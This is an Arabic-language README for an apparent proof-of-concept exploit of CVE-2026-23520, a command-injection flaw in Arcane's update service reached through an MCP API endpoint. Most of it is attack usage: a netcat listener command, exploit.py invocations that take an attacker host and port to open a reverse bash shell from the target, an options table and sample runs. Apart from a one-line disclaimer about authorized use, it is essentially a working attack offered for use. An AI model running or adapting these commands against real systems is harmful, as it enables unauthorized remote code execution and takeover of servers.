
إثبات مفهوم لاستغلال CVE-2026-23520، وهي ثغرة حقن أوامر في خدمة التحديث الخاصة بـ Arcane، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات API مصممة بعناية.
يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة تنفيذ الأوامر عن بُعد (RCE) التي تؤثر على التطبيقات التي تعرّض نقطة نهاية MCP API ضعيفة (عادةً /api/mcp/connect).
تسمح الثغرة بتنفيذ أوامر على مستوى النظام عبر طلب API مُصمم خصيصًا.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| الوسيط | الوصف |
|---|---|
| target | عنوان IP أو نطاق أو رابط الهدف |
| --lhost | عنوان IP للمهاجم |
| --lport | منفذ المهاجم |
| العلم | الوصف |
|---|---|
| -p, --port | منفذ الهدف (الافتراضي: 443) |
| -s, --scheme | http أو https (الافتراضي: https) |
| -e, --endpoint | مسار نقطة نهاية API |
| -t, --timeout | مهلة الطلب |
| -v, --verbose | إخراج التصحيح |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash.للاستخدام المصرح به ولأغراض تعليمية فقط.
Parosh B